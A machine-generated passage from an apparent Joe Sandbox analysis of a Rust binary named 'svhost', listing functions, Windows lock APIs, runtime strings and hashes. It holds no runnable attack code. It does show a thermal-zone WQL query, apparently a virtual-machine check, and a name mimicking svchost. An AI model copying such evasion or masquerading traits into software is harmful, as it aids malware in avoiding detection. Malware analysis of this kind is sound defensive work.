                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF7AF63D998
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: assertion failed: self.ref_count < usize::MAX$called `Result::unwrap()` on an `Err` value
                                • API String ID: 17069307-2863322548
                                • Opcode ID: d050c1346555c6b6f4560ad0ac4c7ec127da576ef437f8f848ac3ccdb861344f
                                • Instruction ID: a5ed5c28db250146735ded676d39297f13866250aa4cb6bdc085e1039322f996
                                • Opcode Fuzzy Hash: d050c1346555c6b6f4560ad0ac4c7ec127da576ef437f8f848ac3ccdb861344f
                                • Instruction Fuzzy Hash: 3951AC76A0AB8599EB14EF64E4403E8B3B4FB08768F964635CE9C037A4DF38D595C320
                                Function 00007FF7AF6DB370 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,?,00000001,?,?,00007FF7AF738BE3,?,?,?,00000000), ref: 00007FF7AF6DB3A5
                                • WakeConditionVariable.KERNEL32(?,?,?,?,00000000,?,00000001,?,?,00007FF7AF738BE3,?,?,?,00000000), ref: 00007FF7AF6DB3E3
                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,00000000,?,00000001,?,?,00007FF7AF738BE3,?,?,?,00000000), ref: 00007FF7AF6DB405
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                • String ID: called `Result::unwrap()` on an `Err` value
                                • API String ID: 1466638765-2333694755
                                • Opcode ID: faa7235d952407269018866506eea315d0cf5f1c2468197cc24905847318e688
                                • Instruction ID: e51c4d412a35ac65d970c2f58461c442be87a0c80b16ee959d3430f62a4cebae
                                • Opcode Fuzzy Hash: faa7235d952407269018866506eea315d0cf5f1c2468197cc24905847318e688
                                • Instruction Fuzzy Hash: 56311526F0AAC199FB11EB25E4001FC67A5AB08764FC69132DE9C177A8DF3CD156C720
                                Function 00007FF7AF6C97A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74memoryCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: String$AllocFree
                                • String ID: SELECT * FROM MSAcpi_ThermalZoneTemperature$WQL
                                • API String ID: 344208780-2989581318
                                • Opcode ID: aba45a9f2cc0df3f0a8dd6bbd7212ea228eaa940f230c740ad772cdb8b0ba9d6
                                • Instruction ID: e6832269eb697ab5d35fa030a642bab9f988788d50230f2751547654a138a9ae
                                • Opcode Fuzzy Hash: aba45a9f2cc0df3f0a8dd6bbd7212ea228eaa940f230c740ad772cdb8b0ba9d6
                                • Instruction Fuzzy Hash: 6A319C76A06B8585EB20AF29E8403ECB7B1F748B98F455631CE9D13BA5DF78D182C310
                                Function 00007FF7AF6F9570 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: Handle$Close$ErrorFileInformationLast
                                • String ID:
                                • API String ID: 4143594976-0
                                • Opcode ID: d10bdb83e81920fe39587ce34b0c014ca81055099d354bd233aa8afeab4ab65f
                                • Instruction ID: 78b992ef4cee628a9e6c316e0a274613328df604ffccc4e14e02664122912e14
                                • Opcode Fuzzy Hash: d10bdb83e81920fe39587ce34b0c014ca81055099d354bd233aa8afeab4ab65f
                                • Instruction Fuzzy Hash: BA31D422F0A79584FB21A765D8003FCA2A6AF453A8F961231DD5D13BF8DF3CA481C360
                                Function 00007FF7AF7388A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: AcquireConditionExclusiveLockSleepVariable
                                • String ID: called `Result::unwrap()` on an `Err` value
                                • API String ID: 97112084-2333694755
                                • Opcode ID: cd778d371f97b48b3c08be2deae736598b6d909bdbab662677a8acbd8f3abcd7
                                • Instruction ID: 2f75264568d89a88d29d95a1c2e4cd6b6d8c0ca7c4c70c153f692c241650172a
                                • Opcode Fuzzy Hash: cd778d371f97b48b3c08be2deae736598b6d909bdbab662677a8acbd8f3abcd7
                                • Instruction Fuzzy Hash: C771B52BA0B6D595EA55AB25E8047F9A7A0FB48764FC64336DE6C073E0DF38D485C320
                                Function 00007FF7AF682E70 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 179COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,00007FF7AF84F648), ref: 00007FF7AF68C1D2
                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,00007FF7AF84F648), ref: 00007FF7AF68C23C
                                Strings
                                • /rustc/b11fbfbf351b94c7eecf9e6749a4544a6d4717fa\library\alloc\src\vec\mod.rs, xrefs: 00007FF7AF682F89
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: /rustc/b11fbfbf351b94c7eecf9e6749a4544a6d4717fa\library\alloc\src\vec\mod.rs
                                • API String ID: 17069307-1320783005
                                • Opcode ID: 0590971a778924b02d84ec8e1b084993bf769c49d538564c2626056766008c1d
                                • Instruction ID: 624ab9d0ddbec08637cfc07b6d2b3be3f8564797814a2259358e48232c80971a
                                • Opcode Fuzzy Hash: 0590971a778924b02d84ec8e1b084993bf769c49d538564c2626056766008c1d
                                • Instruction Fuzzy Hash: A5610623A0A6C1D5FB11AB69E9403F8A765AB147A9F865231DE5D133F1DF3CA486C320
                                Function 00007FF7AF673EC0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 155COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00007FF7AF6728A6,?,?,?,?,?), ref: 00007FF7AF673EE5
                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00007FF7AF6728A6,?,?,?,?,?), ref: 00007FF7AF67403F
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: failed to wake I/O driver
                                • API String ID: 17069307-3515527018
                                • Opcode ID: 33938f7029ebd33c002679b974a77dd3fc542bfc94bb1928776c3b3b34b55e61
                                • Instruction ID: f231ccfca85c36bd1e139045e3e652d8f10cc5fc743f8887607f9ef6ed2261a1
                                • Opcode Fuzzy Hash: 33938f7029ebd33c002679b974a77dd3fc542bfc94bb1928776c3b3b34b55e61
                                • Instruction Fuzzy Hash: 0B619122A0AB81C6EA20EB6594443E873A5FB047B8F951735CE7D477E0DF38E4428720
                                Function 00007FF7AF63EE00 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: called `Result::unwrap()` on an `Err` value
                                • API String ID: 17069307-2333694755
                                • Opcode ID: 0efa22aab91a461b8937cc29a5c0f59ca5e46d7831d92153a9b9c3d282c26d91
                                • Instruction ID: a918c62bfbb60710aabdd98f287113637105bce723e44bfc5fc710a855c16193
                                • Opcode Fuzzy Hash: 0efa22aab91a461b8937cc29a5c0f59ca5e46d7831d92153a9b9c3d282c26d91
                                • Instruction Fuzzy Hash: 1B618C36A0AB8199FB18AF64D4403ECB7A5FB18758F864239DA8C077A4DF789548C360
                                Function 00007FF7AF621A50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: called `Result::unwrap()` on an `Err` value
                                • API String ID: 17069307-2333694755
                                • Opcode ID: 9a7a0b1e0e9ce485195cf8afa541d66d5a1fc96da4b906b01eca126267b0bc44
                                • Instruction ID: 088b785850d8f5968c3cdb3be0d0e7d533c9098400a3b110fe1e77d0514197fe
                                • Opcode Fuzzy Hash: 9a7a0b1e0e9ce485195cf8afa541d66d5a1fc96da4b906b01eca126267b0bc44
                                • Instruction Fuzzy Hash: 6A51AF26E0ABC189FB11AB25D8403FC67B5BB49758F86A535CE8C177A5DF38E185C320
                                Function 00007FF7AF67C8F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,-000000C8,00000000,?,?), ref: 00007FF7AF67C934
                                • SleepConditionVariableSRW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,-000000C8,00000000,?,?), ref: 00007FF7AF67C99F
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: AcquireConditionExclusiveLockSleepVariable
                                • String ID: called `Result::unwrap()` on an `Err` value
                                • API String ID: 97112084-2333694755
                                • Opcode ID: 79b7480f11a8a901cec035d06b3459a15bd8739cb695c789b24746d279124e5b
                                • Instruction ID: 05fc944a006197c783939d22c6b430357a87ffcc4d47cf5e905ba46ef5ec6407
                                • Opcode Fuzzy Hash: 79b7480f11a8a901cec035d06b3459a15bd8739cb695c789b24746d279124e5b
                                • Instruction Fuzzy Hash: D551D427B0AB9199FB51EB60E8403EC7BA4BB04368FC64535CE9C437A5DF389186C760
                                Function 00007FF7AF68C7D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF7AF69703B), ref: 00007FF7AF68C7FF
                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF7AF69703B), ref: 00007FF7AF68C8E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: assertion failed: prev.ref_count() >= 1
                                • API String ID: 17069307-4037388766
                                • Opcode ID: df858a2c678fd843274559886e3f46777a6dc6b883ed6179acb8649c79bf71ef
                                • Instruction ID: 6cb0b8589b46b57f728ba48eeead86a66d4737a8497f6e128d75db72f5fdf99d
                                • Opcode Fuzzy Hash: df858a2c678fd843274559886e3f46777a6dc6b883ed6179acb8649c79bf71ef
                                • Instruction Fuzzy Hash: 9941F363A097C199FB11AB24A4043FCABA1BB05768F854635CFAD037E5CF389185C3A0
                                Function 00007FF7AF68E920 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,00000000,?,?,00007FF7AF697211), ref: 00007FF7AF68E94C
                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,00000000,00000000,?,?,00007FF7AF697211), ref: 00007FF7AF68EA1B
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: assertion failed: prev.ref_count() >= 1
                                • API String ID: 17069307-4037388766
                                • Opcode ID: e7edcb4fe5617ce7d7602e8a0953f245409dcc282a8e37c0d7fb4f77c287f41e
                                • Instruction ID: ce745227a0ecb6361c24eabb9d2636773f56c579581c6b3badb75b7f74cafaec
                                • Opcode Fuzzy Hash: e7edcb4fe5617ce7d7602e8a0953f245409dcc282a8e37c0d7fb4f77c287f41e
                                • Instruction Fuzzy Hash: 05412462A097C099FB21A7A4D4003FCBBA1BB157A8F854275CFAD137E5DF389181C3A0
                                Function 00007FF7AF623AC0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AF62326B), ref: 00007FF7AF623AF3
                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7AF62326B), ref: 00007FF7AF623BB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: called `Result::unwrap()` on an `Err` value
                                • API String ID: 17069307-2333694755
                                • Opcode ID: 36aef29e04fac1432c7ddffd5052401d2078b3db30000a2bd1eeac1b174dae37
                                • Instruction ID: 882acf1c62f554c2218e905fe6a54fa50bf4550adffdbd7caba8280ca143f5c5
                                • Opcode Fuzzy Hash: 36aef29e04fac1432c7ddffd5052401d2078b3db30000a2bd1eeac1b174dae37
                                • Instruction Fuzzy Hash: 7141E126E0AB8585FB11EB2498452EC77B5FB19B98F960236CE9D033A0DF38D041C360
                                Function 00007FF7AF5A52D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AF5BC737), ref: 00007FF7AF5A5308
                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,00007FF7AF5BC737), ref: 00007FF7AF5A53C9
                                Strings
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: called `Result::unwrap()` on an `Err` value
                                • API String ID: 17069307-2333694755
                                • Opcode ID: c8fb9f5cb5a5c0fecfefa4872c7dc22c60bf54641e32b45037dfc29e3c1ad1e7
                                • Instruction ID: 1c45351d531954a0cc2724831370ce15ebb0ea70314fa49e465e4213ba1e3781
                                • Opcode Fuzzy Hash: c8fb9f5cb5a5c0fecfefa4872c7dc22c60bf54641e32b45037dfc29e3c1ad1e7
                                • Instruction Fuzzy Hash: E841BD62E0AB9199FB10EF65A844AEC77B0BB58358F824136DE9C537A5DF38E145C320
                                Function 00007FF7AF55B080 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95threadCOMMON
                                Download Yara Rule
                                APIs
                                • SwitchToThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF7AF5C19B8), ref: 00007FF7AF55B0BC
                                Strings
                                • assertion failed: (*next).value.is_some(), xrefs: 00007FF7AF55B181
                                • assertion failed: (*tail).value.is_none()C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.28\src\mpsc\queue.rs, xrefs: 00007FF7AF55B169
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: SwitchThread
                                • String ID: assertion failed: (*next).value.is_some()$assertion failed: (*tail).value.is_none()C:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.28\src\mpsc\queue.rs
                                • API String ID: 115865932-2995990686
                                • Opcode ID: 4e385062db350f972452b193d9c99300d753c2e5d7c2f69cc6fe144536048d3a
                                • Instruction ID: 1243c96bd7895f8f6bf645a240246d62d1c6012ee08700f23c687cd74d497cb3
                                • Opcode Fuzzy Hash: 4e385062db350f972452b193d9c99300d753c2e5d7c2f69cc6fe144536048d3a
                                • Instruction Fuzzy Hash: F741BF26A06A8595FB51AF15D8403FCA770FF98B98F998631EE4C037A1DF38E596C310
                                Function 00007FF7AF6EFEA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,00007FF7AF6F0773), ref: 00007FF7AF6EFEF3
                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,00007FF7AF6F0773), ref: 00007FF7AF6EFF6C
                                Strings
                                • lock count overflow in reentrant mutexlibrary\std\src\sync\remutex.rs, xrefs: 00007FF7AF6EFF98
                                Memory Dump Source
                                • Source File: 00000007.00000002.3379624001.00007FF7AF531000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7AF530000, based on PE: true
                                • Associated: 00000007.00000002.3379592007.00007FF7AF530000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3379815493.00007FF7AF73C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380133390.00007FF7AF84B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380164654.00007FF7AF84D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000007.00000002.3380195050.00007FF7AF883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_7ff7af530000_svhost.jbxd
                                Similarity
                                • API ID: ExclusiveLock$AcquireRelease
                                • String ID: lock count overflow in reentrant mutexlibrary\std\src\sync\remutex.rs
                                • API String ID: 17069307-2303981482
                                • Opcode ID: a354d0babcb506d412384f97e2e7fcb8da848f6d8b762b8d85eaa2767601e705
                                • Instruction ID: ee534245064ba5ed153d2927b9b7b846b2c2056e1cbac57761a1e6db580288e0
                                • Opcode Fuzzy Hash: a354d0babcb506d412384f97e2e7fcb8da848f6d8b762b8d85eaa2767601e705
                                • Instruction Fuzzy Hash: B5417C36A06A819AEB40EB65D8803F8B770FB48798FD14532CE2D537A4DF39E595C320
                                Function 00007FF7AF63F0E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                Download Yara Rule
                                APIs
                                • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7AF6184EB), ref: 00007FF7AF63F11E
                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7AF6184EB), ref: 00007FF7AF63F199
